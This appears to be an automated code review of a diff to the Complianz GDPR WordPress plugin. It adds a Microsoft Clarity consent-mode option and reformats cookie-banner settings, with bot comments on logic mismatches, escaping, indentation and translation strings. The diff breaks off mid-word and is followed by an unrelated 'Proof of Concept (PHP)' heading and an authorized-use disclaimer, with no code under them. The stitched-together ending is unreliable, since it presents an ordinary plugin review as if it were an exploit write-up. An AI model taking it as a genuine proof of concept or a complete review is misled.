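Review bot: The new 'clarity-consent-mode' entry spells its key 'dismissable' while every other entry in the array uses 'dismissible', so the flag will most likely be ignored by whatever reads these definitions; rename it to 'dismissible'. In cmplz_add_referral_to_warnings(), the loop iterates with a reference (&$field) and never calls unset( $field ) afterwards, which leaves a dangling reference to the last element; add the unset after the loop. The strpos( $field['url'], 'complianz.io' ) test is a substring match on the whole URL, and the array has already passed through the cmplz_warning_types filter, so a third-party entry with that string anywhere in its URL would be rewritten too; comparing the host from wp_parse_url() would be stricter. Finally, this hunk mixes a full re-indent of the array with real changes (the new clarity entry, the 'custom-google-maps' and 'textdomain-just-in-time-notice' URL changes, the Google Fonts link moving to https), which makes those changes hard to spot; splitting formatting from behaviour would help review.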
--- a/complianz-gdpr/cookiebanner/class-banner-loader.php
+++ b/complianz-gdpr/cookiebanner/class-banner-loader.php
@@ -474,7 +474,8 @@
 			//if a cookie warning is needed for the stats we don't add a native class, so it will be disabled by the cookie blocker by default
 			$category        = 'statistics';
 			$uses_tagmanager = cmplz_get_option( 'compile_statistics' ) === 'google-tag-manager' ? true : false;
-			$matomo          = cmplz_get_option( 'compile_statistics' ) === 'matomo' ? true : false;
+            $matomo          = cmplz_get_option( 'compile_statistics' ) === 'matomo' ? true : false;
+            $clarity          = cmplz_get_option( 'compile_statistics' ) === 'clarity' ? true : false;

 			//without tag manager, set as functional if no cookie warning required for stats
 			if ( ! $uses_tagmanager && ! $this->cookie_warning_required_stats() ) {
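
Review bot: the added $clarity line and the re-indented $matomo line use spaces where the surrounding context lines use tabs, which turns the untouched $matomo assignment into a changed line; keep the tab indentation so this hunk shows only the new $clarity flag. The trailing ? true : false is redundant, since === already yields a boolean.
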
@@ -490,6 +491,10 @@
 				$category = 'functional';
 			}

+            if ( $clarity && cmplz_get_option( 'clarity_consent_mode' ) === 'yes' ) {
+                $category = 'functional';
+            }
+
 			/*
 			 * Run Tag Manager or gtag by default if consent mode is enabled
 			 */
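
Review bot: the added block sets $category to 'functional' whenever clarity_consent_mode is 'yes', but the template selection further down in this file picks clarity-consent-mode.js only when consent_for_anonymous_stats is also 'yes'. With consent mode on and consent_for_anonymous_stats off, the regular clarity.js would be emitted under the functional category, which by the comment at the top of this function means it is not held back by the cookie blocker. Use the same combined condition in both places, or add a comment explaining why the two checks differ.
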
@@ -662,8 +667,8 @@
 				$script = cmplz_get_template( 'statistics/matomo-tag-manager.js' );
 				$script = str_replace( '{container_id}', esc_attr( cmplz_get_option( 'matomo_container_id' ) ), $script );
 				$script = str_replace( '{matomo_url}', esc_url_raw( trailingslashit( cmplz_get_option( 'matomo_tag_url' ) ) ), $script );
-			}
-			echo apply_filters( 'cmplz_script_filter', $script );
+            }
+            echo apply_filters( 'cmplz_script_filter', $script );

 		}

@@ -717,8 +722,11 @@
 				$script = cmplz_get_template( 'statistics/clicky.js' );
 				$script = str_replace( '{site_ID}', esc_attr( cmplz_get_option( 'clicky_site_id' ) ), $script );
 			} elseif ( $statistics === 'clarity' ) {
-				$script = cmplz_get_template( 'statistics/clarity.js' );
-				$script = str_replace( '{site_ID}', esc_attr( cmplz_get_option( 'clarity_id' ) ), $script );
+                $is_consent_for_anonymous_stats = cmplz_get_option( 'consent_for_anonymous_stats' ) === 'yes';
+                $is_clarity_consent_mode = cmplz_get_option( 'clarity_consent_mode' ) === 'yes';
+                $clarity_script = $is_clarity_consent_mode && $is_consent_for_anonymous_stats ? '-consent-mode' : '';
+                $script = cmplz_get_template("statistics/clarity$clarity_script.js");
+                $script = str_replace('{site_ID}', esc_attr(cmplz_get_option('clarity_id')), $script);
 			} elseif ( $statistics === 'yandex' ) {
 				$script         = cmplz_get_template( 'statistics/yandex.js' );
 				$data_layer     = cmplz_get_option( 'yandex_ecommerce' ) === 'yes';
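
Review bot: the template name is built by interpolation in cmplz_get_template("statistics/clarity$clarity_script.js"), which is safe only because $clarity_script is one of two literals; a short comment saying so, or an explicit if/else with two literal paths, would keep a later edit from feeding an option value into the path. Separately, clarity_id is written into a .js template through esc_attr, which escapes for HTML attribute context; if {site_ID} sits inside a JavaScript string, esc_js or a strict character allow-list on the ID is the matching control. The new lines also drop the tab indentation and the spacing inside parentheses used by the neighbouring branches.
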
@@ -1438,7 +1446,7 @@
 			$tagmanager                                = $statistics === 'google-tag-manager';
 			$matomo                                    = $statistics === 'matomo';
 			$google_analytics                          = $statistics === 'google-analytics';
-			$clicky                                    = $statistics === 'clicky';
+            $clicky                                    = $statistics === 'clicky';
 			$accepted_google_data_processing_agreement = false;
 			$ip_anonymous                              = false;
 			$no_sharing                                = false;
--- a/complianz-gdpr/cookiebanner/settings.php
+++ b/complianz-gdpr/cookiebanner/settings.php
@@ -1,28 +1,35 @@
 <?php
-defined( 'ABSPATH' ) or die( "you do not have access to this page!" );
+/**
+ * Cookie banner settings configuration
+ *
+ * @package COMPLIANZ
+ */
+
+defined( 'ABSPATH' ) || die( 'you do not have access to this page!' );

 /**
  * Currently only in use for TCF banner resets
+ *
  * @return array
  */
 function cmplz_banner_color_schemes() {
 	$schemes = array(
-		'tcf'       => array(
-			'colorpalette_background' => array(
+		'tcf' => array(
+			'colorpalette_background'      => array(
 				'color'  => '#ffffff',
 				'border' => '#333333',
 			),
-			'colorpalette_text'       => array(
+			'colorpalette_text'            => array(
 				'color'     => '#222222',
 				'hyperlink' => '#1E73BE',
 			),
-			'colorpalette_toggles'    => array(
+			'colorpalette_toggles'         => array(
 				'background' => '#61CE71',
 				'bullet'     => '#ffffff',
 				'inactive'   => '#f8be2e',
 			),

-			'colorpalette_button_accept' => array(
+			'colorpalette_button_accept'   => array(
 				'background' => '#333333',
 				'border'     => '#333333',
 				'text'       => '#ffffff',
@@ -44,6 +51,11 @@
 	return $schemes;
 }

+/**
+ * Get banner color scheme options.
+ *
+ * @return array
+ */
 function cmplz_get_banner_color_scheme_options() {
 	$schemes = cmplz_banner_color_schemes();
 	$schemes = array_keys( $schemes );
@@ -55,12 +67,19 @@
 	return $options;
 }

-add_filter( 'cmplz_field', 'cmplz_update_banner_text',10,2 );
-function cmplz_update_banner_text($field, $field_id){
-	if ( ($field_id=== 'message_optin' || $field_id === 'message_optout')
-	     && cmplz_get_option( 'uses_ad_cookies_personalized' ) === 'yes' ){
-		$banner_text = __( "We use technologies like cookies to store and/or access device information. We do this to improve browsing experience and to show (non-) personalized ads. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.", 'complianz-gdpr' );
-		$field['default'] = $banner_text;
+add_filter( 'cmplz_field', 'cmplz_update_banner_text', 10, 2 );
+/**
+ * Update banner text based on ad cookies settings.
+ *
+ * @param array  $field    Field configuration.
+ * @param string $field_id Field identifier.
+ * @return array
+ */
+function cmplz_update_banner_text( $field, $field_id ) {
+	if ( ( 'message_optin' === $field_id || 'message_optout' === $field_id )
+		&& 'yes' === cmplz_get_option( 'uses_ad_cookies_personalized' ) ) {
+		$banner_text          = __( 'We use technologies like cookies to store and/or access device information. We do this to improve browsing experience and to show (non-) personalized ads. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.', 'complianz-gdpr' );
+		$field['default']     = $banner_text;
 		$field['placeholder'] = $banner_text;
 	}

@@ -68,40 +87,50 @@
 }

 add_filter( 'cmplz_fields', 'cmplz_add_cookiebanner_settings', 10 );
+/**
+ * Add cookie banner settings fields.
+ *
+ * @param array $fields Existing fields configuration.
+ * @return array Modified fields configuration.
+ */
 function cmplz_add_cookiebanner_settings( $fields ) {
-	$banner_text = __( "To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.", 'complianz-gdpr' );
-	$category_help = cmplz_get_option( 'country_company' ) === "FR" ? [
+	$banner_text   = __( 'To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.', 'complianz-gdpr' );
+	$category_help = 'FR' === cmplz_get_option( 'country_company' ) ? array(
 		'label' => 'default',
-		'title' => __( "Categories in France", "complianz-gdpr" ),
-		'text'  => __( "Due to the French CNIL guidelines we suggest using the Accept - Deny - View preferences template. For more information, read about the CNIL updated privacy guidelines in this %sarticle%s.",
-			'complianz-gdpr' ),
-		'url'   => "https://complianz.io/cnil-updated-privacy-guidelines/",
-	] : false;
+		'title' => __( 'Categories in France', 'complianz-gdpr' ),
+		/* translators: %s: opening and closing link tags */
+		'text'  => __(
+			'Due to the French CNIL guidelines we suggest using the Accept - Deny - View preferences template. For more information, read about the CNIL updated privacy guidelines in this %1$sarticle%2$s.',
+			'complianz-gdpr'
+		),
+		'url'   => 'https://complianz.io/cnil-updated-privacy-guidelines/',
+	) : false;

-	$fields = array_merge( $fields,
-		[
+	$fields = array_merge(
+		$fields,
+		array(
 			/* ----- General ----- */

-			//for condition purposes only
-			[
+			// For condition purposes only.
+			array(
 				'id'          => 'consent_type',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
 				'data_target' => 'banner',
 				'type'        => 'hidden',
-			],
-			[
+			),
+			array(
 				'id'          => 'title',
-				'label'       => __( "Consent banner title", 'complianz-gdpr' ),
+				'label'       => __( 'Consent banner title', 'complianz-gdpr' ),
 				'placeholder' => __( 'Descriptive title of the cookiebanner', 'complianz-gdpr' ),
 				'tooltip'     => __( 'For internal use only', 'complianz-gdpr' ),
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
 				'data_target' => 'banner',
 				'type'        => 'text',
-			],
+			),

-			[
+			array(
 				'id'               => 'use_categories',
 				'menu_id'          => 'banner-general',
 				'group_id'         => 'banner-general',
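
Review bot: in the $category_help 'text' entry the translators comment still reads "%s: opening and closing link tags" while the string now uses %1$s and %2$s; describe each numbered placeholder on its own. Changing %sarticle%s to %1$sarticle%2$s also changes the msgid, so existing translations of this string stop matching until they are redone; confirm that is intended for this release. The code that fills these placeholders is not part of this hunk and should be checked against the numbered form.
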
@@ -112,27 +141,29 @@
 					'save-preferences' => __( 'Accept - Deny - Save Preferences', 'complianz-gdpr' ),
 					'no'               => __( 'Accept - Deny', 'complianz-gdpr' ),
 				),
-				'label'            => __( "Categories", 'complianz-gdpr' ),
+				'label'            => __( 'Categories', 'complianz-gdpr' ),
 				'tooltip'          => __( 'With categories, you can let users choose which category of cookies they want to accept.', 'complianz-gdpr' ) . ' '
-				                      . __( 'Depending on your settings and cookies you use, there can be two or three categories. With Tag Manager you can use more, custom categories.',
-						'complianz-gdpr' ),
+										. __(
+											'Depending on your settings and cookies you use, there can be two or three categories. With Tag Manager you can use more, custom categories.',
+											'complianz-gdpr'
+										),
 				'help'             => $category_help,
 				'default'          => 'view-preferences',
-				'react_conditions' => [
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'consent_type' => 'optin',
-					]
-				],
-			],
-			[
+					),
+				),
+			),
+			array(
 				'id'          => 'manage_consent_options',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
 				'data_target' => 'banner',
 				'type'        => 'select',
-				'placeholder' => __( "Manage consent", 'complianz-gdpr' ),
-				'label'       => __( "Manage consent display options", 'complianz-gdpr' ),
+				'placeholder' => __( 'Manage consent', 'complianz-gdpr' ),
+				'label'       => __( 'Manage consent display options', 'complianz-gdpr' ),
 				'tooltip'     => __( 'Select how the manage consent text should appear.', 'complianz-gdpr' ),
 				'options'     => array(
 					'hover-hide-mobile' => __( 'Hover on Desktop - Hide on Mobile (Default)', 'complianz-gdpr' ),
@@ -141,153 +172,155 @@
 					'hide-everywhere'   => __( 'Hide everywhere', 'complianz-gdpr' ),
 				),
 				'default'     => 'hover-hide-mobile',
-			],
-			[
-				'id'          => 'disable_cookiebanner',
-				'source_id' => 'enable_cookie_banner',
-				'data_target' => 'banner',
-				'source_mapping' => [
-					//source value => target value
-					'no' => 1,
+			),
+			array(
+				'id'             => 'disable_cookiebanner',
+				'source_id'      => 'enable_cookie_banner',
+				'data_target'    => 'banner',
+				'source_mapping' => array(
+					// Source value => target value.
+					'no'  => 1,
 					'yes' => 0,
-				],
-				'menu_id'     => 'banner-general',
-				'group_id'    => 'banner-general',
-				'type'        => 'checkbox',
-				'label'       => __( "Disable consent banner", 'complianz-gdpr' ),
-				'default'     => false,
-			],
-			[
+				),
+				'menu_id'        => 'banner-general',
+				'group_id'       => 'banner-general',
+				'type'           => 'checkbox',
+				'label'          => __( 'Disable consent banner', 'complianz-gdpr' ),
+				'default'        => false,
+			),
+			array(
 				'id'               => 'default',
 				'menu_id'          => 'banner-general',
 				'group_id'         => 'banner-general',
 				'data_target'      => 'banner',
 				'type'             => 'checkbox',
-				'label'            => __( "Default consent banner", 'complianz-gdpr' ),
-				'help'             => [
+				'label'            => __( 'Default consent banner', 'complianz-gdpr' ),
+				'help'             => array(
 					'label' => 'default',
-					'title' => __( "Default consent banner", 'complianz-gdpr' ),
-					'text'  => __( 'When enabled, this is the consent banner that is used for all visitors. Enabling it will disable this setting on the current default banner. Disabling it will enable randomly a different default banner.',
-						"complianz-gdpr" ),
-				],
+					'title' => __( 'Default consent banner', 'complianz-gdpr' ),
+					'text'  => __(
+						'When enabled, this is the consent banner that is used for all visitors. Enabling it will disable this setting on the current default banner. Disabling it will enable randomly a different default banner.',
+						'complianz-gdpr'
+					),
+				),
 				'default'          => false,
-				'react_conditions' => [
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'a_b_testing_buttons' => '1',
-					]
-				],
-			],
-			[
+					),
+				),
+			),
+			array(
 				'id'          => 'hide_preview',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
 				'data_target' => 'banner',
 				'type'        => 'checkbox',
-				'label'       => __( "Hide preview", 'complianz-gdpr' ),
+				'label'       => __( 'Hide preview', 'complianz-gdpr' ),
 				'default'     => false,
-			],
-			[
+			),
+			array(
 				'id'          => 'reset_cookiebanner',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
 				'data_target' => 'banner',
 				'type'        => 'banner-reset-button',
-				'label'       => __( "Reset to default values", 'complianz-gdpr' ),
-				'button_text' => __( "Reset", 'complianz-gdpr' ),
-				'help'        => [
+				'label'       => __( 'Reset to default values', 'complianz-gdpr' ),
+				'button_text' => __( 'Reset', 'complianz-gdpr' ),
+				'help'        => array(
 					'label' => 'warning',
-					'title' => __( "Reset the consent banner", 'complianz-gdpr' ),
-					'text'  => __( "If you want to start from the default values, you can use the reset button.", "complianz-gdpr" ) . ' ' . __( "Texts will also get reset.", "complianz-gdpr" ),
-				],
+					'title' => __( 'Reset the consent banner', 'complianz-gdpr' ),
+					'text'  => __( 'If you want to start from the default values, you can use the reset button.', 'complianz-gdpr' ) . ' ' . __( 'Texts will also get reset.', 'complianz-gdpr' ),
+				),
 				'default'     => false,
-			],
+			),

 			/*
 			 *
 			 * US settings
 			 *
-			 * */
+			 */

-			[
-				'id'               => 'dismiss_on_scroll',
+			array(
+				'id'          => 'dismiss_on_scroll',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
-				'data_target'      => 'banner',
-				'type'             => 'checkbox',
-				'label'            => __( "Dismiss on scroll", 'complianz-gdpr' ),
-				'tooltip'          => __( 'When dismiss on scroll is enabled, the consent banner will be dismissed as soon as the user scrolls.', 'complianz-gdpr' ),
-				'default'          => false,
-				'react_conditions' => [
+				'data_target' => 'banner',
+				'type'        => 'checkbox',
+				'label'       => __( 'Dismiss on scroll', 'complianz-gdpr' ),
+				'tooltip'     => __( 'When dismiss on scroll is enabled, the consent banner will be dismissed as soon as the user scrolls.', 'complianz-gdpr' ),
+				'default'     => false,
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'consent_type' => 'optout',
-					]
-				],
-			],
-			[
-				'id'               => 'dismiss_on_timeout',
+					),
+				),
+			),
+			array(
+				'id'          => 'dismiss_on_timeout',
 				'menu_id'     => 'banner-general',
 				'group_id'    => 'banner-general',
-				'data_target'      => 'banner',
-				'type'             => 'checkbox',
-				'label'            => __( "Dismiss on time out", 'complianz-gdpr' ),
-				'tooltip'          => __( 'When dismiss on time out is enabled, the consent banner will be dismissed after 10 seconds, or the time you choose below.', 'complianz-gdpr' ),
-				'default'          => false,
-				'react_conditions' => [
+				'data_target' => 'banner',
+				'type'        => 'checkbox',
+				'label'       => __( 'Dismiss on time out', 'complianz-gdpr' ),
+				'tooltip'     => __( 'When dismiss on time out is enabled, the consent banner will be dismissed after 10 seconds, or the time you choose below.', 'complianz-gdpr' ),
+				'default'     => false,
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'consent_type' => 'optout',
-					]
-				],
-			],
-			[
+					),
+				),
+			),
+			array(
 				'id'               => 'dismiss_timeout',
-				'menu_id'     => 'banner-general',
-				'group_id'    => 'banner-general',
+				'menu_id'          => 'banner-general',
+				'group_id'         => 'banner-general',
 				'data_target'      => 'banner',
 				'type'             => 'number',
-				'label'            => __( "Timeout in seconds", 'complianz-gdpr' ),
+				'label'            => __( 'Timeout in seconds', 'complianz-gdpr' ),
 				'default'          => 10,
-				'react_conditions' => [
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'dismiss_on_timeout' => true,
 						'consent_type'       => 'optout',
-					]
-				],
-			],
+					),
+				),
+			),
 			/* ----- Appearance ----- */
-			[
+			array(
 				'id'          => 'position',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'select',
-				'label'       => __( "Position", 'complianz-gdpr' ),
+				'label'       => __( 'Position', 'complianz-gdpr' ),
 				'options'     => array(
-					'center'       => __( "Center", 'complianz-gdpr' ),
-					'bottom'       => __( "Bottom", 'complianz-gdpr' ),
-					'bottom-left'  => __( "Bottom left", 'complianz-gdpr' ),
-					'bottom-right' => __( "Bottom right", 'complianz-gdpr' ),
+					'center'       => __( 'Center', 'complianz-gdpr' ),
+					'bottom'       => __( 'Bottom', 'complianz-gdpr' ),
+					'bottom-left'  => __( 'Bottom left', 'complianz-gdpr' ),
+					'bottom-right' => __( 'Bottom right', 'complianz-gdpr' ),
 				),
 				'default'     => 'bottom-right',
-			],
-			[
+			),
+			array(
 				'id'          => 'animation',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'select',
-				'label'       => __( "Animation", 'complianz-gdpr' ),
+				'label'       => __( 'Animation', 'complianz-gdpr' ),
 				'options'     => array(
-					'none'  => __( "None", 'complianz-gdpr' ),
-					'fade'  => __( "Fade", 'complianz-gdpr' ),
-					'slide' => __( "Slide", 'complianz-gdpr' ),
+					'none'  => __( 'None', 'complianz-gdpr' ),
+					'fade'  => __( 'Fade', 'complianz-gdpr' ),
+					'slide' => __( 'Slide', 'complianz-gdpr' ),
 				),
 				'default'     => 'none',
-			],
-			[
+			),
+			array(
 				'id'               => 'banner_width',
 				'menu_id'          => 'appearance',
 				'group_id'         => 'appearance',
@@ -296,124 +329,127 @@
 				'default'          => '526',
 				'minimum'          => '300',
 				'maximum'          => '1500',
-				'label'            => __( "Width of the banner in pixels", 'complianz-gdpr' ),
-				'react_conditions' => [
+				'label'            => __( 'Width of the banner in pixels', 'complianz-gdpr' ),
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'!position' => 'bottom',
-					]
-				],
-			],
+					),
+				),
+			),

-			[
+			array(
 				'id'               => 'checkbox_style',
 				'menu_id'          => 'appearance',
 				'group_id'         => 'appearance',
 				'data_target'      => 'banner',
 				'type'             => 'select',
-				'label'            => __( "Checkbox style", 'complianz-gdpr' ),
-				'tooltip'          => __( "This style is for the checkboxes on the consent banner, as well as on your policy for managing consent.", 'complianz-gdpr' ),
-				'options'          => [
-					'classic' => __( "Classic", 'complianz-gdpr' ),
-					'slider'  => __( "Slider", 'complianz-gdpr' ),
-				],
+				'label'            => __( 'Checkbox style', 'complianz-gdpr' ),
+				'tooltip'          => __( 'This style is for the checkboxes on the consent banner, as well as on your policy for managing consent.', 'complianz-gdpr' ),
+				'options'          => array(
+					'classic' => __( 'Classic', 'complianz-gdpr' ),
+					'slider'  => __( 'Slider', 'complianz-gdpr' ),
+				),
 				'default'          => 'slider',
-				'react_conditions' => [
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'!use_categories' => 'no',
-					]
-				],
-			],
-			[
+					),
+				),
+			),
+			array(
 				'id'          => 'legal_documents',
-				'menu_id'          => 'appearance',
-				'group_id'         => 'appearance',
+				'menu_id'     => 'appearance',
+				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'checkbox',
 				'default'     => true,
-				'label'       => __( "Legal document links on banner", 'complianz-gdpr' ),
+				'label'       => __( 'Legal document links on banner', 'complianz-gdpr' ),
 				'comment'     => __( 'On the consent banner the generated documents are shown. The title is based on the actual post title.', 'complianz-gdpr' ),
-			],
-			[
+			),
+			array(
 				'id'          => 'use_logo',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
-				'tooltip'     => __( "You can upload your own logo, hide it, or use the site logo.", 'complianz-gdpr' ) . ' '
-				                 . __( "The site logo is the default logo set in your theme's site identity.", 'complianz-gdpr' ),
+				'tooltip'     => __( 'You can upload your own logo, hide it, or use the site logo.', 'complianz-gdpr' ) . ' '
+								. __( "The site logo is the default logo set in your theme's site identity.", 'complianz-gdpr' ),
 				'type'        => 'banner_logo',
-				'label'       => __( "Logo", 'complianz-gdpr' ),
+				'label'       => __( 'Logo', 'complianz-gdpr' ),
 				'options'     => array(
-					'hide'      => __( "Hide", 'complianz-gdpr' ),
-					'site'      => __( "Use Site Logo", 'complianz-gdpr' ),
-					'complianz' => __( "Use "Powered by Complianz"", 'complianz-gdpr' ),
-					'custom'    => __( "Upload Custom Logo", 'complianz-gdpr' ) . ' (2 : 1)',
+					'hide'      => __( 'Hide', 'complianz-gdpr' ),
+					'site'      => __( 'Use Site Logo', 'complianz-gdpr' ),
+					'complianz' => __( 'Use "Powered by Complianz"', 'complianz-gdpr' ),
+					'custom'    => __( 'Upload Custom Logo', 'complianz-gdpr' ) . ' (2 : 1)',
 				),
 				'default'     => 'hide',
-			],
-			[
+			),
+			array(
 				'id'          => 'logo_attachment_id',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'hidden',
-			],
-			[
+			),
+			array(
 				'id'          => 'close_button',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'checkbox',
-				'label'       => __( "Close button", 'complianz-gdpr' ),
-				'tooltip'     => __( "If enabled, a close icon will be shown on your consent banner.", 'complianz-gdpr' ),
+				'label'       => __( 'Close button', 'complianz-gdpr' ),
+				'tooltip'     => __( 'If enabled, a close icon will be shown on your consent banner.', 'complianz-gdpr' ),
 				'default'     => true,
-			],
-			[
+			),
+			array(
 				'id'          => 'use_box_shadow',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'checkbox',
 				'default'     => true,
-				'label'       => __( "Box shadow", 'complianz-gdpr' ),
-			],
-			[
+				'label'       => __( 'Box shadow', 'complianz-gdpr' ),
+			),
+			array(
 				'id'          => 'header_footer_shadow',
 				'menu_id'     => 'appearance',
 				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'default'     => false,
 				'type'        => 'checkbox',
-				'label'       => __( "Box shadow on header and footer", 'complianz-gdpr' ),
-			],
-			[
+				'label'       => __( 'Box shadow on header and footer', 'complianz-gdpr' ),
+			),
+			array(
 				'id'               => 'soft_cookiewall',
 				'menu_id'          => 'appearance',
 				'group_id'         => 'appearance',
 				'data_target'      => 'banner',
 				'type'             => 'checkbox',
 				'default'          => false,
-				'label'            => __( "Show as soft cookie wall", 'complianz-gdpr' ),
-				'comment'   => __("Unlike the regular cookie wall, the soft cookie wall doesn't block visitors that do not deny consent or dismiss the banner. It will however forces a choice before visitors enter your website.",
-					"complianz-gdpr") .' '. cmplz_sprintf(__("Read more about %sthe soft cookie wall%s.", "complianz-gdpr"),'<a target="_blank" href="https://complianz.io/the-soft-cookie-wall/" aria-label="Read more about the soft cookie wall">', '</a>'),
-				'help'             => [
+				'label'            => __( 'Show as soft cookie wall', 'complianz-gdpr' ),
+				'comment'          => __(
+					"Unlike the regular cookie wall, the soft cookie wall doesn't block visitors that do not deny consent or dismiss the banner. It will however forces a choice before visitors enter your website.",
+					'complianz-gdpr'
+					/* translators: %1$s: opening link tag, %2$s: closing link tag */
+				) . ' ' . cmplz_sprintf( __( 'Read more about %1$sthe soft cookie wall%2$s.', 'complianz-gdpr' ), '<a target="_blank" href="https://complianz.io/the-soft-cookie-wall/" aria-label="Read more about the soft cookie wall">', '</a>' ),
+				'help'             => array(
 					'label' => 'default',
-					'title' => __( "Soft cookie wall", 'complianz-gdpr' ),
-					'text'  => __( "Read more about our privacy-friendly cookie wall.", 'complianz-gdpr' ),
+					'title' => __( 'Soft cookie wall', 'complianz-gdpr' ),
+					'text'  => __( 'Read more about our privacy-friendly cookie wall.', 'complianz-gdpr' ),
 					'url'   => 'https://complianz.io/the-soft-cookie-wall/',
-				],
-				'react_conditions' => [
+				),
+				'react_conditions' => array(
 					'relation' => 'AND',
-					[
+					array(
 						'!consent_type' => 'optout',
-					]
-				],
-			],
-			[
+					),
+				),
+			),
+			array(
 				'id'          => 'colorpalette_border_radius',
-				'menu_id'          => 'appearance',
-				'group_id'         => 'appearance',
+				'menu_id'     => 'appearance',
+				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'borderradius',
 				'default'     => array(
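
Review bot: in the soft_cookiewall 'comment' entry the translators comment is placed inside the argument list of the first __() call, after 'complianz-gdpr', although the placeholders it describes belong to the second __() call inside cmplz_sprintf; put the cmplz_sprintf expression on its own line with the comment directly above it so the pairing is obvious to readers and extraction tools. The switch from %s to %1$s and %2$s changes the msgid of "Read more about ... the soft cookie wall", so existing translations of it will need updating, and the carried-over source string still contains "It will however forces a choice".
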
@@ -423,12 +459,12 @@
 					'left'   => '12',
 					'type'   => 'px',
 				),
-				'label'       => __( "Border radius banner", 'complianz-gdpr' ),
-			],
-			[
+				'label'       => __( 'Border radius banner', 'complianz-gdpr' ),
+			),
+			array(
 				'id'          => 'border_width',
-				'menu_id'          => 'appearance',
-				'group_id'         => 'appearance',
+				'menu_id'     => 'appearance',
+				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'borderwidth',
 				'default'     => array(
@@ -437,12 +473,12 @@
 					'bottom' => '0',
 					'left'   => '0',
 				),
-				'label'       => __( "Border width banner", 'complianz-gdpr' ),
-			],
-			[
+				'label'       => __( 'Border width banner', 'complianz-gdpr' ),
+			),
+			array(
 				'id'          => 'buttons_border_radius',
-				'menu_id'          => 'appearance',
-				'group_id'         => 'appearance',
+				'menu_id'     => 'appearance',
+				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'borderradius',
 				'default'     => array(
@@ -452,28 +488,28 @@
 					'left'   => '6',
 					'type'   => 'px',
 				),
-				'label'       => __( "Border radius buttons", 'complianz-gdpr' ),
-			],
-			[
+				'label'       => __( 'Border radius buttons', 'complianz-gdpr' ),
+			),
+			array(
 				'id'          => 'font_size',
-				'menu_id'          => 'appearance',
-				'group_id'         => 'appearance',
+				'menu_id'     => 'appearance',
+				'group_id'    => 'appearance',
 				'data_target' => 'banner',
 				'type'        => 'number',
 				'default'     => 12,
-				'label'       => __( "Font size", 'complianz-gdpr' ),
-			],
+				'label'       => __( 'Font size', 'complianz-gdpr' ),
+			),

 			/* ----- colors ----- */

-			[
+			array(
 				'id'           => 'colorpalette_background',
 				'menu_id'      => 'colors',
 				'group_id'     => 'colors-general',
 				'data_target'  => 'banner',
 				'type'         => 'colorpicker',
-				'master_label' => __( "General", 'complianz-gdpr' ),
-				'label'        => __( "Background", 'complianz-gdpr' ),
+				'master_label' => __( 'General', 'complianz-gdpr' ),
+				'label'        => __( 'Background', 'complianz-gdpr' ),
 				'default'      => array(
 					'color'  => '#ffffff',
 					'border' => '#f2f2f2',
@@ -481,21 +517,21 @@
 				'fields'       => array(
 					array(
 						'fieldname' => 'color',
-						'label'     => __( "Background", 'complianz-gdpr' ),
+						'label'     => __( 'Background', 'complianz-gdpr' ),
 					),
 					array(
 						'fieldname' => 'border',
-						'label'     => __( "Border", 'complianz-gdpr' ),
+						'label'     => __( 'Border', 'complianz-gdpr' ),
 					),
 				),
-			],
-			[
+			),
+			array(
 				'id'          => 'colorpalette_text',
-				'menu_id'      => 'colors',
-				'group_id'     => 'colors-general',
+				'menu_id'     => 'colors',
+				'group_id'    => 'colors-general',
 				'data_target' => 'banner',
 				'type'        => 'colorpicker',
-				'label'       => __( "Text", 'complianz-gdpr' ),
+				'label'       => __( 'Text', 'complianz-gdpr' ),
 				'default'     => array(
 					'color'     => '#222222',
 					'hyperlink' => '#1E73BE',
@@ -503,54 +539,54 @@
 				'fields'      => array(
 					array(
 						'fieldname' => 'color',
-						'label'     => __( "Color", 'complianz-gdpr' ),
+						'label'     => __( 'Color', 'complianz-gdpr' ),
 					),
 					array(
 						'fieldname' => 'hyperlink',
-						'label'     => __( "Hyperlink", 'complianz-gdpr' ),
+						'label'     => __( 'Hyperlink', 'complianz-gdpr' ),
 					),
 				),
-			],
-			[
-				'id'          => 'colorpalette_toggles',
-				'menu_id'      => 'colors',
-				'group_id'     => 'col

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

